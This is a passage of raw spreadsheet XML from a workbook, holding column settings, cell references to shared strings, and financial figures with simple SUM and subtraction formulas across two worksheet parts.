    <col min="6897" max="6897" width="43" style="2" customWidth="1"/>
    <col min="6898" max="7151" width="10" style="2"/>
    <col min="7152" max="7152" width="50.42578125" style="2" customWidth="1"/>
    <col min="7153" max="7153" width="43" style="2" customWidth="1"/>
    <col min="7154" max="7407" width="10" style="2"/>
    <col min="7408" max="7408" width="50.42578125" style="2" customWidth="1"/>
    <col min="7409" max="7409" width="43" style="2" customWidth="1"/>
    <col min="7410" max="7663" width="10" style="2"/>
    <col min="7664" max="7664" width="50.42578125" style="2" customWidth="1"/>
    <col min="7665" max="7665" width="43" style="2" customWidth="1"/>
    <col min="7666" max="7919" width="10" style="2"/>
    <col min="7920" max="7920" width="50.42578125" style="2" customWidth="1"/>
    <col min="7921" max="7921" width="43" style="2" customWidth="1"/>
    <col min="7922" max="8175" width="10" style="2"/>
    <col min="8176" max="8176" width="50.42578125" style="2" customWidth="1"/>
    <col min="8177" max="8177" width="43" style="2" customWidth="1"/>
    <col min="8178" max="8431" width="10" style="2"/>
    <col min="8432" max="8432" width="50.42578125" style="2" customWidth="1"/>
    <col min="8433" max="8433" width="43" style="2" customWidth="1"/>
    <col min="8434" max="8687" width="10" style="2"/>
    <col min="8688" max="8688" width="50.42578125" style="2" customWidth="1"/>
    <col min="8689" max="8689" width="43" style="2" customWidth="1"/>
    <col min="8690" max="8943" width="10" style="2"/>
    <col min="8944" max="8944" width="50.42578125" style="2" customWidth="1"/>
    <col min="8945" max="8945" width="43" style="2" customWidth="1"/>
    <col min="8946" max="9199" width="10" style="2"/>
    <col min="9200" max="9200" width="50.42578125" style="2" customWidth="1"/>
    <col min="9201" max="9201" width="43" style="2" customWidth="1"/>
    <col min="9202" max="9455" width="10" style="2"/>
    <col min="9456" max="9456" width="50.42578125" style="2" customWidth="1"/>
    <col min="9457" max="9457" width="43" style="2" customWidth="1"/>
    <col min="9458" max="9711" width="10" style="2"/>
    <col min="9712" max="9712" width="50.42578125" style="2" customWidth="1"/>
    <col min="9713" max="9713" width="43" style="2" customWidth="1"/>
    <col min="9714" max="9967" width="10" style="2"/>
    <col min="9968" max="9968" width="50.42578125" style="2" customWidth="1"/>
    <col min="9969" max="9969" width="43" style="2" customWidth="1"/>
    <col min="9970" max="10223" width="10" style="2"/>
    <col min="10224" max="10224" width="50.42578125" style="2" customWidth="1"/>
    <col min="10225" max="10225" width="43" style="2" customWidth="1"/>
    <col min="10226" max="10479" width="10" style="2"/>
    <col min="10480" max="10480" width="50.42578125" style="2" customWidth="1"/>
    <col min="10481" max="10481" width="43" style="2" customWidth="1"/>
    <col min="10482" max="10735" width="10" style="2"/>
    <col min="10736" max="10736" width="50.42578125" style="2" customWidth="1"/>
    <col min="10737" max="10737" width="43" style="2" customWidth="1"/>
    <col min="10738" max="10991" width="10" style="2"/>
    <col min="10992" max="10992" width="50.42578125" style="2" customWidth="1"/>
    <col min="10993" max="10993" width="43" style="2" customWidth="1"/>
    <col min="10994" max="11247" width="10" style="2"/>
    <col min="11248" max="11248" width="50.42578125" style="2" customWidth="1"/>
    <col min="11249" max="11249" width="43" style="2" customWidth="1"/>
    <col min="11250" max="11503" width="10" style="2"/>
    <col min="11504" max="11504" width="50.42578125" style="2" customWidth="1"/>
    <col min="11505" max="11505" width="43" style="2" customWidth="1"/>
    <col min="11506" max="11759" width="10" style="2"/>
    <col min="11760" max="11760" width="50.42578125" style="2" customWidth="1"/>
    <col min="11761" max="11761" width="43" style="2" customWidth="1"/>
    <col min="11762" max="12015" width="10" style="2"/>
    <col min="12016" max="12016" width="50.42578125" style="2" customWidth="1"/>
    <col min="12017" max="12017" width="43" style="2" customWidth="1"/>
    <col min="12018" max="12271" width="10" style="2"/>
    <col min="12272" max="12272" width="50.42578125" style="2" customWidth="1"/>
    <col min="12273" max="12273" width="43" style="2" customWidth="1"/>
    <col min="12274" max="12527" width="10" style="2"/>
    <col min="12528" max="12528" width="50.42578125" style="2" customWidth="1"/>
    <col min="12529" max="12529" width="43" style="2" customWidth="1"/>
    <col min="12530" max="12783" width="10" style="2"/>
    <col min="12784" max="12784" width="50.42578125" style="2" customWidth="1"/>
    <col min="12785" max="12785" width="43" style="2" customWidth="1"/>
    <col min="12786" max="13039" width="10" style="2"/>
    <col min="13040" max="13040" width="50.42578125" style="2" customWidth="1"/>
    <col min="13041" max="13041" width="43" style="2" customWidth="1"/>
    <col min="13042" max="13295" width="10" style="2"/>
    <col min="13296" max="13296" width="50.42578125" style="2" customWidth="1"/>
    <col min="13297" max="13297" width="43" style="2" customWidth="1"/>
    <col min="13298" max="13551" width="10" style="2"/>
    <col min="13552" max="13552" width="50.42578125" style="2" customWidth="1"/>
    <col min="13553" max="13553" width="43" style="2" customWidth="1"/>
    <col min="13554" max="13807" width="10" style="2"/>
    <col min="13808" max="13808" width="50.42578125" style="2" customWidth="1"/>
    <col min="13809" max="13809" width="43" style="2" customWidth="1"/>
    <col min="13810" max="14063" width="10" style="2"/>
    <col min="14064" max="14064" width="50.42578125" style="2" customWidth="1"/>
    <col min="14065" max="14065" width="43" style="2" customWidth="1"/>
    <col min="14066" max="14319" width="10" style="2"/>
    <col min="14320" max="14320" width="50.42578125" style="2" customWidth="1"/>
    <col min="14321" max="14321" width="43" style="2" customWidth="1"/>
    <col min="14322" max="14575" width="10" style="2"/>
    <col min="14576" max="14576" width="50.42578125" style="2" customWidth="1"/>
    <col min="14577" max="14577" width="43" style="2" customWidth="1"/>
    <col min="14578" max="14831" width="10" style="2"/>
    <col min="14832" max="14832" width="50.42578125" style="2" customWidth="1"/>
    <col min="14833" max="14833" width="43" style="2" customWidth="1"/>
    <col min="14834" max="15087" width="10" style="2"/>
    <col min="15088" max="15088" width="50.42578125" style="2" customWidth="1"/>
    <col min="15089" max="15089" width="43" style="2" customWidth="1"/>
    <col min="15090" max="15343" width="10" style="2"/>
    <col min="15344" max="15344" width="50.42578125" style="2" customWidth="1"/>
    <col min="15345" max="15345" width="43" style="2" customWidth="1"/>
    <col min="15346" max="15599" width="10" style="2"/>
    <col min="15600" max="15600" width="50.42578125" style="2" customWidth="1"/>
    <col min="15601" max="15601" width="43" style="2" customWidth="1"/>
    <col min="15602" max="15855" width="10" style="2"/>
    <col min="15856" max="15856" width="50.42578125" style="2" customWidth="1"/>
    <col min="15857" max="15857" width="43" style="2" customWidth="1"/>
    <col min="15858" max="16111" width="10" style="2"/>
    <col min="16112" max="16112" width="50.42578125" style="2" customWidth="1"/>
    <col min="16113" max="16113" width="43" style="2" customWidth="1"/>
    <col min="16114" max="16367" width="10" style="2"/>
    <col min="16368" max="16368" width="10" style="2" customWidth="1"/>
    <col min="16369" max="16379" width="10" style="2"/>
    <col min="16380" max="16384" width="10" style="46"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:2" s="2" customFormat="1" ht="18" customHeight="1">
      <c r="A1" s="66" t="s">
        <v>1155</v>
      </c>
      <c r="B1" s="57"/>
    </row>
    <row r="2" spans="1:2" s="2" customFormat="1" ht="28.9" customHeight="1">
      <c r="A2" s="774" t="s">
        <v>1156</v>
      </c>
      <c r="B2" s="774"/>
    </row>
    <row r="3" spans="1:2" s="2" customFormat="1" ht="24.95" customHeight="1">
      <c r="A3" s="775" t="s">
        <v>270</v>
      </c>
      <c r="B3" s="775"/>
    </row>
    <row r="4" spans="1:2" s="2" customFormat="1" ht="23.1" customHeight="1">
      <c r="A4" s="49" t="s">
        <v>344</v>
      </c>
      <c r="B4" s="49" t="s">
        <v>345</v>
      </c>
    </row>
    <row r="5" spans="1:2" s="1" customFormat="1" ht="23.1" customHeight="1">
      <c r="A5" s="67" t="s">
        <v>1157</v>
      </c>
      <c r="B5" s="68">
        <v>987452</v>
      </c>
    </row>
    <row r="6" spans="1:2" s="2" customFormat="1" ht="23.1" customHeight="1">
      <c r="A6" s="69" t="s">
        <v>1158</v>
      </c>
      <c r="B6" s="70">
        <v>987452</v>
      </c>
    </row>
    <row r="7" spans="1:2" s="2" customFormat="1" ht="23.1" customHeight="1">
      <c r="A7" s="69" t="s">
        <v>1159</v>
      </c>
      <c r="B7" s="70">
        <f>B5-B6</f>
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="1:2" s="1" customFormat="1" ht="23.1" customHeight="1">
      <c r="A8" s="71" t="s">
        <v>1160</v>
      </c>
      <c r="B8" s="68">
        <f>B9+B12</f>
        <v>172200</v>
      </c>
    </row>
    <row r="9" spans="1:2" s="2" customFormat="1" ht="23.1" customHeight="1">
      <c r="A9" s="69" t="s">
        <v>1161</v>
      </c>
      <c r="B9" s="72">
        <f>SUM(B10:B11)</f>
        <v>60000</v>
      </c>
    </row>
    <row r="10" spans="1:2" s="2" customFormat="1" ht="23.1" customHeight="1">
      <c r="A10" s="69" t="s">
        <v>1162</v>
      </c>
      <c r="B10" s="70"/>
    </row>
    <row r="11" spans="1:2" s="2" customFormat="1" ht="23.1" customHeight="1">
      <c r="A11" s="69" t="s">
        <v>1163</v>
      </c>
      <c r="B11" s="70">
        <v>60000</v>
      </c>
    </row>
    <row r="12" spans="1:2" s="2" customFormat="1" ht="23.1" customHeight="1">
      <c r="A12" s="69" t="s">
        <v>1164</v>
      </c>
      <c r="B12" s="70">
        <f>SUM(B13:B14)</f>
        <v>112200</v>
      </c>
    </row>
    <row r="13" spans="1:2" s="2" customFormat="1" ht="23.1" customHeight="1">
      <c r="A13" s="69" t="s">
        <v>1165</v>
      </c>
      <c r="B13" s="70">
        <v>48900</v>
      </c>
    </row>
    <row r="14" spans="1:2" s="2" customFormat="1" ht="23.1" customHeight="1">
      <c r="A14" s="69" t="s">
        <v>1166</v>
      </c>
      <c r="B14" s="70">
        <v>63300</v>
      </c>
    </row>
    <row r="15" spans="1:2" s="1" customFormat="1" ht="23.1" customHeight="1">
      <c r="A15" s="73" t="s">
        <v>1167</v>
      </c>
      <c r="B15" s="68">
        <f>B16+B17+B18</f>
        <v>181960</v>
      </c>
    </row>
    <row r="16" spans="1:2" s="2" customFormat="1" ht="23.1" customHeight="1">
      <c r="A16" s="74" t="s">
        <v>1168</v>
      </c>
      <c r="B16" s="70"/>
    </row>
    <row r="17" spans="1:2" s="2" customFormat="1" ht="23.1" customHeight="1">
      <c r="A17" s="74" t="s">
        <v>1169</v>
      </c>
      <c r="B17" s="70">
        <v>60000</v>
      </c>
    </row>
    <row r="18" spans="1:2" s="2" customFormat="1" ht="23.1" customHeight="1">
      <c r="A18" s="74" t="s">
        <v>1170</v>
      </c>
      <c r="B18" s="70">
        <f>SUM(B19:B22)</f>
        <v>121960</v>
      </c>
    </row>
    <row r="19" spans="1:2" s="2" customFormat="1" ht="23.1" customHeight="1">
      <c r="A19" s="74" t="s">
        <v>1171</v>
      </c>
      <c r="B19" s="70">
        <v>2640</v>
      </c>
    </row>
    <row r="20" spans="1:2" s="2" customFormat="1" ht="23.1" customHeight="1">
      <c r="A20" s="74" t="s">
        <v>1172</v>
      </c>
      <c r="B20" s="70">
        <v>7120</v>
      </c>
    </row>
    <row r="21" spans="1:2" s="2" customFormat="1" ht="23.1" customHeight="1">
      <c r="A21" s="74" t="s">
        <v>1173</v>
      </c>
      <c r="B21" s="70">
        <v>48900</v>
      </c>
    </row>
    <row r="22" spans="1:2" s="2" customFormat="1" ht="23.1" customHeight="1">
      <c r="A22" s="74" t="s">
        <v>1174</v>
      </c>
      <c r="B22" s="70">
        <v>63300</v>
      </c>
    </row>
    <row r="23" spans="1:2" s="1" customFormat="1" ht="23.1" customHeight="1">
      <c r="A23" s="73" t="s">
        <v>1175</v>
      </c>
      <c r="B23" s="68">
        <f>SUM(B24:B27)</f>
        <v>33579</v>
      </c>
    </row>
    <row r="24" spans="1:2" s="2" customFormat="1" ht="23.1" customHeight="1">
      <c r="A24" s="74" t="s">
        <v>1176</v>
      </c>
      <c r="B24" s="70">
        <v>9392</v>
      </c>
    </row>
    <row r="25" spans="1:2" s="2" customFormat="1" ht="23.1" customHeight="1">
      <c r="A25" s="74" t="s">
        <v>1177</v>
      </c>
      <c r="B25" s="70">
        <v>24049</v>
      </c>
    </row>
    <row r="26" spans="1:2" s="2" customFormat="1" ht="23.1" customHeight="1">
      <c r="A26" s="74" t="s">
        <v>1178</v>
      </c>
      <c r="B26" s="70"/>
    </row>
    <row r="27" spans="1:2" s="2" customFormat="1" ht="23.1" customHeight="1">
      <c r="A27" s="74" t="s">
        <v>1179</v>
      </c>
      <c r="B27" s="70">
        <v>138</v>
      </c>
    </row>
    <row r="28" spans="1:2" s="1" customFormat="1" ht="23.1" customHeight="1">
      <c r="A28" s="73" t="s">
        <v>1180</v>
      </c>
      <c r="B28" s="68">
        <f>B5+B11-B19-B20</f>
        <v>1037692</v>
      </c>
    </row>
    <row r="29" spans="1:2" s="2" customFormat="1" ht="23.1" customHeight="1">
      <c r="A29" s="74" t="s">
        <v>1181</v>
      </c>
      <c r="B29" s="70">
        <v>1037692</v>
      </c>
    </row>
    <row r="30" spans="1:2" s="2" customFormat="1" ht="23.1" customHeight="1">
      <c r="A30" s="74" t="s">
        <v>1182</v>
      </c>
      <c r="B30" s="70"/>
    </row>
    <row r="31" spans="1:2" s="1" customFormat="1" ht="23.1" customHeight="1">
      <c r="A31" s="73" t="s">
        <v>1183</v>
      </c>
      <c r="B31" s="68">
        <v>1069000</v>
      </c>
    </row>
    <row r="32" spans="1:2" s="2" customFormat="1" ht="23.1" customHeight="1">
      <c r="A32" s="74" t="s">
        <v>1181</v>
      </c>
      <c r="B32" s="70">
        <v>1069000</v>
      </c>
    </row>
    <row r="33" spans="1:2" s="2" customFormat="1" ht="23.1" customHeight="1">
      <c r="A33" s="74" t="s">
        <v>1182</v>
      </c>
      <c r="B33" s="70">
        <f>B31-B32</f>
        <v>0</v>
      </c>
    </row>
    <row r="34" spans="1:2" s="2" customFormat="1" ht="39" customHeight="1">
      <c r="A34" s="776" t="s">
        <v>1184</v>
      </c>
      <c r="B34" s="776"/>
    </row>
    <row r="35" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A35" s="57"/>
      <c r="B35" s="56"/>
    </row>
    <row r="36" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A36" s="57"/>
      <c r="B36" s="56"/>
    </row>
    <row r="37" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A37" s="57"/>
      <c r="B37" s="56"/>
    </row>
    <row r="38" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A38" s="57"/>
      <c r="B38" s="56"/>
    </row>
    <row r="39" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A39" s="57"/>
      <c r="B39" s="56"/>
    </row>
    <row r="40" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A40" s="57"/>
      <c r="B40" s="56"/>
    </row>
    <row r="41" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A41" s="57"/>
      <c r="B41" s="56"/>
    </row>
    <row r="42" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A42" s="57"/>
      <c r="B42" s="56"/>
    </row>
    <row r="43" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A43" s="57"/>
      <c r="B43" s="56"/>
    </row>
    <row r="44" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A44" s="57"/>
      <c r="B44" s="56"/>
    </row>
    <row r="45" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A45" s="57"/>
      <c r="B45" s="56"/>
    </row>
    <row r="46" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A46" s="57"/>
      <c r="B46" s="56"/>
    </row>
    <row r="47" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A47" s="57"/>
      <c r="B47" s="56"/>
    </row>
    <row r="48" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A48" s="57"/>
      <c r="B48" s="56"/>
    </row>
    <row r="49" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A49" s="57"/>
      <c r="B49" s="56"/>
    </row>
    <row r="50" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A50" s="57"/>
      <c r="B50" s="56"/>
    </row>
    <row r="51" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A51" s="57"/>
      <c r="B51" s="56"/>
    </row>
    <row r="52" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A52" s="57"/>
      <c r="B52" s="56"/>
    </row>
    <row r="53" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A53" s="57"/>
      <c r="B53" s="56"/>
    </row>
    <row r="54" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A54" s="57"/>
      <c r="B54" s="56"/>
    </row>
    <row r="55" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A55" s="57"/>
      <c r="B55" s="56"/>
    </row>
    <row r="56" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A56" s="57"/>
      <c r="B56" s="56"/>
    </row>
    <row r="57" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A57" s="57"/>
      <c r="B57" s="56"/>
    </row>
    <row r="58" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A58" s="57"/>
      <c r="B58" s="56"/>
    </row>
    <row r="59" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A59" s="57"/>
      <c r="B59" s="56"/>
    </row>
    <row r="60" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A60" s="57"/>
      <c r="B60" s="56"/>
    </row>
    <row r="61" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A61" s="57"/>
      <c r="B61" s="56"/>
    </row>
    <row r="62" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A62" s="57"/>
      <c r="B62" s="56"/>
    </row>
    <row r="63" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A63" s="57"/>
    </row>
    <row r="64" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A64" s="57"/>
    </row>
    <row r="65" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A65" s="57"/>
    </row>
    <row r="66" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A66" s="57"/>
    </row>
    <row r="67" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A67" s="57"/>
    </row>
    <row r="68" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A68" s="57"/>
    </row>
    <row r="69" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A69" s="57"/>
    </row>
    <row r="70" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A70" s="57"/>
    </row>
    <row r="71" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A71" s="57"/>
    </row>
    <row r="72" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A72" s="57"/>
    </row>
    <row r="73" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A73" s="57"/>
    </row>
    <row r="74" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A74" s="57"/>
    </row>
    <row r="75" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A75" s="57"/>
    </row>
    <row r="76" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A76" s="57"/>
    </row>
    <row r="77" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A77" s="57"/>
    </row>
    <row r="78" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A78" s="57"/>
    </row>
    <row r="79" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A79" s="57"/>
    </row>
    <row r="80" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A80" s="57"/>
    </row>
    <row r="81" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A81" s="57"/>
    </row>
    <row r="82" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A82" s="57"/>
    </row>
    <row r="83" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A83" s="57"/>
    </row>
    <row r="84" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A84" s="57"/>
    </row>
  </sheetData>
  <mergeCells count="3">
    <mergeCell ref="A2:B2"/>
    <mergeCell ref="A3:B3"/>
    <mergeCell ref="A34:B34"/>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V38"/>
  <sheetViews>
    <sheetView zoomScale="87" zoomScaleNormal="87" workbookViewId="0">
      <pane ySplit="5" topLeftCell="A6" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="G25" sqref="G25"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="34.85546875" style="608" customWidth="1"/>
    <col min="2" max="4" width="13.5703125" style="608" customWidth="1"/>
    <col min="5" max="5" width="13.5703125" style="621" customWidth="1"/>
    <col min="6" max="16350" width="10" style="608"/>
    <col min="16351" max="16384" width="10" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:16350" s="601" customFormat="1" ht="20.25" customHeight="1">
      <c r="A1" s="622" t="s">
        <v>268</v>
      </c>
      <c r="B1" s="623"/>
      <c r="C1" s="623"/>
      <c r="D1" s="623"/>
      <c r="E1" s="623"/>
    </row>
    <row r="2" spans="1:16350" s="602" customFormat="1" ht="26.25" customHeight="1">
      <c r="A2" s="645" t="s">
        <v>269</v>
      </c>
      <c r="B2" s="645"/>
      <c r="C2" s="645"/>
      <c r="D2" s="645"/>
      <c r="E2" s="645"/>
    </row>
    <row r="3" spans="1:16350" s="603" customFormat="1" ht="24" customHeight="1">
      <c r="B3" s="613"/>
      <c r="C3" s="613"/>
      <c r="D3" s="613"/>
      <c r="E3" s="234" t="s">
        <v>270</v>
      </c>
    </row>
    <row r="4" spans="1:16350" s="604" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A4" s="646" t="s">
        <v>271</v>
      </c>
      <c r="B4" s="646" t="s">
        <v>272</v>
      </c>
      <c r="C4" s="647" t="s">
        <v>273</v>
      </c>
      <c r="D4" s="646" t="s">
        <v>274</v>
      </c>
      <c r="E4" s="647" t="s">
        <v>275</v>
      </c>
    </row>
    <row r="5" spans="1:16350" s="605" customFormat="1" ht="14.25" customHeight="1">
      <c r="A5" s="646"/>
      <c r="B5" s="646"/>
      <c r="C5" s="648"/>
      <c r="D5" s="646"/>
      <c r="E5" s="648"/>
    </row>
    <row r="6" spans="1:16350" s="604" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A6" s="624" t="s">
        <v>276</v>
      </c>
      <c r="B6" s="427">
        <f>SUM(B7:B20)</f>
        <v>263819</v>
      </c>
      <c r="C6" s="427">
        <f>SUM(C7:C20)</f>
        <v>281998</v>
      </c>
      <c r="D6" s="427">
        <f>SUM(D7:D20)</f>
        <v>250213</v>
      </c>
      <c r="E6" s="427">
        <f>SUM(E7:E20)</f>
        <v>205089</v>
      </c>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625"/>
      <c r="AF6" s="625"/>
      <c r="AG6" s="625"/>
      <c r="AH6" s="625"/>
      <c r="AI6" s="625"/>
      <c r="AJ6" s="625"/>
      <c r="AK6" s="625"/>
      <c r="AL6" s="625"/>
      <c r="AM6" s="625"/>
      <c r="AN6" s="625"/>
      <c r="AO6" s="625"/>
      <c r="AP6" s="625"/>
      <c r="AQ6" s="625"/>
      <c r="AR6" s="625"/>
      <c r="AS6" s="625"/>
      <c r="AT6" s="625"/>
      <c r="AU6" s="625"/>
      <c r="AV6" s="625"/>
      <c r="AW6" s="625"/>
      <c r="AX6" s="625"/>
      <c r="AY6" s="625"/>
      <c r="AZ6" s="625"/>
      <c r="BA6" s="625"/>
      <c r="BB6" s="625"/>
      <c r="BC6" s="625"/>
      <c r="BD6" s="625"/>
      <c r="BE6" s="625"/>
      <c r="BF6" s="625"/>
      <c r="BG6" s="625"/>
      <c r="BH6" s="625"/>
      <c r="BI6" s="625"/>
      <c r="BJ6" s="625"/>
      <c r="BK6" s="625"/>
      <c r="BL6" s="625"/>
      <c r="BM6" s="625"/>
      <c r="BN6" s="625"/>
      <c r="BO6" s="625"/>
      <c r="BP6" s="625"/>
      <c r="BQ6" s="625"/>
      <c r="BR6" s="625"/>
      <c r="BS6" s="625"/>
      <c r="BT6" s="625"/>
      <c r="BU6" s="625"/>
      <c r="BV6" s="625"/>
      <c r="BW6" s="625"/>
      <c r="BX6" s="625"/>
      <c r="BY6" s="625"/>
      <c r="BZ6" s="625"/>
      <c r="CA6" s="625"/>
      <c r="CB6" s="625"/>
      <c r="CC6" s="625"/>
      <c r="CD6" s="625"/>
      <c r="CE6" s="625"/>
      <c r="CF6" s="625"/>
      <c r="CG6" s="625"/>
      <c r="CH6" s="625"/>
      <c r="CI6" s="625"/>
      <c r="CJ6" s="625"/>
      <c r="CK6" s="625"/>
      <c r="CL6" s="625"/>
      <c r="CM6" s="625"/>
      <c r="CN6" s="625"/>
      <c r="CO6" s="625"/>
      <c r="CP6" s="625"/>
      <c r="CQ6" s="625"/>
      <c r="CR6" s="625"/>
      <c r="CS6" s="625"/>
      <c r="CT6" s="625"/>
      <c r="CU6" s="625"/>
      <c r="CV6" s="625"/>
      <c r="CW6" s="625"/>
      <c r="CX6" s="625"/>
      <c r="CY6" s="625"/>
      <c r="CZ6" s="625"/>
      <c r="DA6" s="625"/>
      <c r="DB6" s="625"/>
      <c r="DC6" s="625"/>
      <c r="DD6" s="625"/>
      <c r="DE6" s="625"/>
      <c r="DF6" s="625"/>
      <c r="DG6" s="625"/>
      <c r="DH6" s="625"/>
      <c r="DI6" s="625"/>
      <c r="DJ6" s="625"/>
      <c r="DK6" s="625"/>
      <c r="DL6" s="625"/>
      <c r="DM6" s="625"/>
      <c r="DN6" s="625"/>
      <c r="DO6" s="625"/>
      <c r="DP6" s="625"/>
      <c r="DQ6" s="625"/>
      <c r="DR6" s="625"/>
      <c r="DS6" s="625"/>
      <c r="DT6" s="625"/>
      <c r="DU6" s="625"/>
      <c r="DV6" s="625"/>
      <c r="DW6" s="625"/>
      <c r="DX6" s="625"/>
      <c r="DY6" s="625"/>
      <c r="DZ6" s="625"/>
      <c r="EA6" s="625"/>
      <c r="EB6" s="625"/>
      <c r="EC6" s="625"/>
      <c r="ED6" s="625"/>
      <c r="EE6" s="625"/>
      <c r="EF6" s="625"/>
      <c r="EG6" s="625"/>
      <c r="EH6" s="625"/>
      <c r="EI6" s="625"/>
      <c r="EJ6" s="625"/>
      <c r="EK6" s="625"/>
      <c r="EL6" s="625"/>
      <c r="EM6" s="625"/>
      <c r="EN6" s="625"/>
      <c r="EO6" s="625"/>
      <c r="EP6" s="625"/>
      <c r="EQ6" s="625"/>
      <c r="ER6" s="625"/>
      <c r="ES6" s="625"/>
      <c r="ET6" s="625"/>
      <c r="EU6" s="625"/>
      <c r="EV6" s="625"/>
      <c r="EW6" s="625"/>
      <c r="EX6" s="625"/>
      <c r="EY6" s="625"/>
      <c r="EZ6" s="625"/>
      <c r="FA6" s="625"/>
      <c r="FB6" s="625"/>
      <c r="FC6" s="625"/>
      <c r="FD6" s="625"/>
      <c r="FE6" s="625"/>
      <c r="FF6" s="625"/>
      <c r="FG6" s="625"/>
      <c r="FH6" s="625"/>
      <c r="FI6" s="625"/>
      <c r="FJ6" s="625"/>
      <c r="FK6" s="625"/>
      <c r="FL6" s="625"/>
      <c r="FM6" s="625"/>
      <c r="FN6" s="625"/>
      <c r="FO6" s="625"/>
      <c r="FP6" s="625"/>
      <c r="FQ6" s="625"/>
      <c r="FR6" s="625"/>
      <c r="FS6" s="625"/>
      <c r="FT6" s="625"/>
      <c r="FU6" s="625"/>
      <c r="FV6" s="625"/>
      <c r="FW6" s="625"/>
      <c r="FX6" s="625"/>
      <c r="FY6" s="625"/>
      <c r="FZ6" s="625"/>
      <c r="GA6" s="625"/>
      <c r="GB6" s="625"/>
      <c r="GC6" s="625"/>
      <c r="GD6" s="625"/>
      <c r="GE6" s="625"/>
      <c r="GF6" s="625"/>
      <c r="GG6" s="625"/>
      <c r="GH6" s="625"/>
      <c r="GI6" s="625"/>
      <c r="GJ6" s="625"/>
      <c r="GK6" s="625"/>
      <c r="GL6" s="625"/>
      <c r="GM6" s="625"/>
      <c r="GN6" s="625"/>
      <c r="GO6" s="625"/>
      <c r="GP6" s="625"/>
      <c r="GQ6" s="625"/>
      <c r="GR6" s="625"/>
      <c r="GS6" s="625"/>
      <c r="GT6" s="625"/>
      <c r="GU6" s="625"/>
      <c r="GV6" s="625"/>
      <c r="GW6" s="625"/>
      <c r="GX6" s="625"/>
      <c r="GY6" s="625"/>
      <c r="GZ6" s="625"/>
      <c r="HA6" s="625"/>
      <c r="HB6" s="625"/>
      <c r="HC6" s="625"/>
      <c r="HD6" s="625"/>
      <c r="HE6" s="625"/>
      <c r="HF6" s="625"/>
      <c r="HG6" s="625"/>
      <c r="HH6" s="625"/>
      <c r="HI6" s="625"/>
      <c r="HJ6" s="625"/>
      <c r="HK6" s="625"/>
      <c r="HL6" s="625"/>
      <c r="HM6" s="625"/>
      <c r="HN6" s="625"/>
      <c r="HO6" s="625"/>
      <c r="HP6" s="625"/>
      <c r="HQ6" s="625"/>
      <c r="HR6" s="625"/>
      <c r="HS6" s="625"/>
      <c r="HT6" s="625"/>
      <c r="HU6" s="625"/>
      <c r="HV6" s="625"/>
      <c r="HW6" s="625"/>
      <c r="HX6" s="625"/>
      <c r="HY6" s="625"/>
      <c r="HZ6" s="625"/>
      <c r="IA6" s="625"/>
      <c r="IB6" s="625"/>
      <c r="IC6" s="625"/>
      <c r="ID6" s="625"/>
      <c r="IE6" s="625"/>
      <c r="IF6" s="625"/>
      <c r="IG6" s="625"/>
      <c r="IH6" s="625"/>
      <c r="II6" s="625"/>
      <c r="IJ6" s="625"/>
      <c r="IK6" s="625"/>
      <c r="IL6" s="625"/>
      <c r="IM6" s="625"/>
      <c r="IN6" s="625"/>
      <c r="IO6" s="625"/>
